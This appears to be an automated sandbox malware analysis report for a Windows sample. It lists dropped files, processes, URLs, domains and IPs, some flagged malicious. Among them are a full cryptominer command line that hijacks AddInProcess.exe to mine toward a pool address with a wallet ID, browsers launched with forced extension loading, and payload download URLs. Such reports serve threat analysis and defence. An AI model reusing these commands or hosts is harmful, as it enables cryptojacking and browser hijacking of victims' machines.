JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\en_GB\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\en_US\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\es\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\es_419\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\et\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\eu\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fa\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fi\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fil\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fr_CA\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\gl\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\gu\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\hi\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\hr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\hu\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\hy\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\id\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\is\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\it\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\iw\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ja\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ka\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\kk\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\km\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\kn\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ko\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\lo\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\lt\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\lv\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ml\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\mn\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\mr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ms\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\my\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ne\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\nl\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\no\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\pa\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\pl\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\pt_BR\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\pt_PT\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ro\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ru\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\si\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sk\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sl\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sv\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sw\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ta\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\te\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\th\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\tr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\uk\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ur\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\vi\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\zh_CN\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\zh_HK\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\zh_TW\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\zu\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_metadata\verified_contents.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\dasherSettingSchema.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\manifest.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\offscreendocument.html
HTML document, ASCII text
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\offscreendocument_main.js
ASCII text, with very long lines (4369)
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\page_embed_script.js
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\service_worker_bin_prod.js
ASCII text, with very long lines (4369)
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\ca9cbf2c-434f-4137-b1d9-fc2e1b91db60.tmp
Google Chrome extension, version 3
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\CRX_INSTALL\_metadata\verified_contents.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\CRX_INSTALL\content.js
Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\CRX_INSTALL\content_new.js
Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\CRX_INSTALL\manifest.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\e9cd6829-fbd7-41ae-b906-daeaa5ab9731.tmp
Google Chrome extension, version 3
dropped
C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 10:50:01 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 10:48:05 2023, atime=Thu Aug 5 05:45:01 2021, length=3311504, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
Chrome Cache Entry: 514
ASCII text, with very long lines (1746)
downloaded
Chrome Cache Entry: 515
ASCII text, with very long lines (768)
downloaded
Chrome Cache Entry: 516
ASCII text
downloaded
Chrome Cache Entry: 517
ASCII text, with very long lines (65531)
downloaded
Chrome Cache Entry: 518
ASCII text, with very long lines (3572), with no line terminators
downloaded
Chrome Cache Entry: 519
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 520
ASCII text, with very long lines (2124)
downloaded
Chrome Cache Entry: 521
ASCII text
downloaded
There are 292 hidden files.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\zlONcFaXkc.exe
"C:\Users\user\Desktop\zlONcFaXkc.exe"
malicious
C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1988,i,7184690276915472336,9481308763283154706,262144 /prefetch:3
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:3
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6956 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2120,i,14171565827234090732,9899416858446876294,262144 /prefetch:3
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2028,i,6617554079144185053,3298712530362425133,262144 /prefetch:3
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3028 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe
"C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,18268589753722857029,6653790801772642783,262144 /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
There are 16 hidden processes.

URLs

Name
IP
Malicious
http://185.196.10.233/dll/ghghghgfg.xml
185.196.10.233
malicious
https://assets.msn.com/bundles/v1/edgeChromium/latest/common-segments.11aff16404408a58d3d2.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-app-upsell.b15413e73bafe92e0855.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-banner_index_js-cs-core-desktop_card-components_dis-cef191.888669d9cc0659b01a27.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.65258d4f38c7e7963827.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/pill-wc.87e5c35451d51ad2c9c1.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v1.ad1f555a047bcac24a4a.js
23.11.231.163
https://deff.nelreports.net/api/report?cat=msn
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/PowerBI_24x.svg
23.11.231.163
https://aefd.nelreports.net/api/report?cat=bingcsp
unknown
https://deff.nelreports.net/api/report
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneDrive_24x.svg
23.11.231.163
https://docs.google.com/
unknown
https://www.youtube.com
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://deff.nelreports.net/api/report?cat=msnw
unknown
https://www.instagram.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/waterfall-view-feed.da1860afbfeb79eba90c.js
23.11.231.163
https://assets.msn.com/service/v1/news/users/me/locations?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svg
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/superBreakingNews.b103d390df46602376d8.js
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Sway_24x.svg
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.3220005356a33ce0ca94.js
23.11.231.163
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.119ca1abd9fdaf26e071.js
23.11.231.163
https://outlook.office.com/mail/compose?isExtension=true
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://i.y.qq.com/n2/m/index.html
unknown
https://www.deezer.com/
unknown
https://assets.msn.com/staticsb/statics/latest/common/icons/ZoomWhite.svg
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/RewardsCoachmarkData.c462c3980af18bc60b9d.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/codex-bing-chat.d4705abeab944b647de2.js
23.11.231.163
https://web.telegram.org/
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Yammer_24x.svg
23.11.231.163
https://sb.scorecardresearch.com/b2?rn=1713906139242&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=09C025F5A71D6FE2180F319FA60A6E8D&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
3.163.101.92
https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/SunnyDayV3.svg
23.11.231.163
https://stackoverflow.com/q/14436606/23354
unknown
https://assets.msn.com/service/news/feed/pages/weblayout
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_core_dist_interaction-tracker_MouseTracker_js-libs_weather-shared-wc_dist_utilities_entr-072035.11606a415b7b5f44447f.js
23.11.231.163
https://drive-daily-2.corp.google.com/
unknown
https://unitedstates1.ss.wd.microsoft.us/
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-placement-manager.5ea7db000698f8928d23.js
23.11.231.163
http://crl.ver)
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_channel-page-utils_dist_UrlUtilities_js-libs_feed-layout_dist_Utils_js-libs_river-data-t-5c6710.8c7d0e28efea755d336f.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/conditionalBannerWC.6d8019b2ba4ee047b8c5.js
23.11.231.163
https://xmrig.com/wizard
unknown
https://drive-daily-1.corp.google.com/
unknown
https://excel.new?from=EdgeM365Shoreline
unknown
https://drive-daily-5.corp.google.com/
unknown
https://plus.google.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.2a930d83a1ebb2ea4b2d.js
23.11.231.163
https://bzib.nelreports.net/api/report?cat=bingbusiness
23.6.117.16
https://assets.msn.com/statics/icons/favicon_newtabpage.png
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneNote_24x.svg
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json
23.11.231.163
https://chromewebstore.google.com/
unknown
https://drive-preprod.corp.google.com/
unknown
https://xmrig.com/benchmark/%s
unknown
https://chrome.google.com/webstore/
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v3v4.5873ec4aa566b5d8efc3.js
23.11.231.163
https://bard.google.com/
unknown
http://www.gzip.org/zlib/rfc-gzip.html
unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1713906147886&w=0&anoncknm=app_anon&NoResponseBody=true
104.208.16.92
https://c.msn.com/c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=59892F5548B8410F875CC582C027017F&MUID=09C025F5A71D6FE2180F319FA60A6E8D
20.110.205.119
https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.6cd4b923cfe7c0d8b058.js
23.11.231.163
https://www.office.com
unknown
https://outlook.live.com/mail/0/
unknown
https://tidal.com/
unknown
https://ntp.msn.com
unknown
https://gaana.com/
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/ToDo_24x.svg
23.11.231.163
https://outlook.live.com/mail/compose?isExtension=true
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://c.msn.com/c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0
20.110.205.119
https://files.catbox.moe/k541xr.dllJ
unknown
https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
unknown
https://apis.google.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.6985524dca6d732452d7.js
23.11.231.163
https://domains.google.com/suggest/flow
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/common-feed-libs.1f70b20165d70f57b9b6.js
23.11.231.163
https://latest.web.skype.com/?browsername=edge_canary_shoreline
unknown
https://word.new?from=EdgeM365Shoreline
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.e6fcf9edbaadfb663ccb.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/digest-card.7224d7f5906215f25e3c.js
23.11.231.163
http://schemas.microsof.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-data-connector.02a4c4f575b24365379f.js
23.11.231.163
https://mail.google.com/mail/mu/mp/266/#tl/Inbox
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Visio_24x.svg
23.11.231.163
https://drive-autopush.corp.google.com/
unknown
https://github.com/mgravell/protobuf-net
unknown
https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
unknown
https://open.spotify.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.9abeb397be7183994289.js
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Word_24x.svg
23.11.231.163
https://twitter.com/
unknown
https://files.catbox.moe/kwfxr7.dll
unknown
https://m.vk.com/
unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
172.253.124.104
https://xot.traxa41.net/ext/analytic?do=init&from=Chrome3
23.106.238.238
There are 90 hidden URLs.

Domains

Name
IP
Malicious
gjhfhgdg.insane.wang
185.196.10.233
malicious
starsmm.org
179.43.170.230
malicious
bzib.nelreports.net
unknown
malicious
xot.traxa41.net
unknown
malicious
fg.microsoft.map.fastly.net
199.232.214.172
chrome.cloudflare-dns.com
172.64.41.3
addons.i7con.net
23.106.238.238
plus.l.google.com
142.250.105.139
www.google.com
172.253.124.104
googlehosted.l.googleusercontent.com
172.253.124.132
clients2.googleusercontent.com
unknown
ntp.msn.com
unknown
apis.google.com
unknown
There are 3 hidden domains.

IPs

IP
Domain
Country
Malicious
192.168.2.4
unknown
unknown
malicious
185.196.10.233
gjhfhgdg.insane.wang
Switzerland
malicious
179.43.170.230
starsmm.org
Panama
malicious
23.6.117.16
unknown
United States
192.168.2.16
unknown
unknown
23.11.231.177
unknown
United States
172.253.124.104
www.google.com
United States
131.253.33.200
unknown
United States
162.159.61.3
unknown
United States
104.208.16.92
unknown
United States
52.159.108.190
unknown
United States
13.107.213.41
unknown
United States
20.110.205.119
unknown
United States
204.79.197.219
unknown
United States
172.64.41.3
chrome.cloudflare-dns.com
United States
172.253.124.132
googlehosted.l.googleusercontent.com
United States
23.0.175.178
unknown
United States
13.107.21.237
unknown
United States
23.0.175.195
unknown
United States
23.106.238.238
addons.i7con.net
United Kingdom
239.255.255.250
unknown
Reserved
23.11.231.163
unknown
United States
23.101.168.44
unknown
United States
3.163.101.92
unknown
United States
127.0.0.1
unknown
unknown
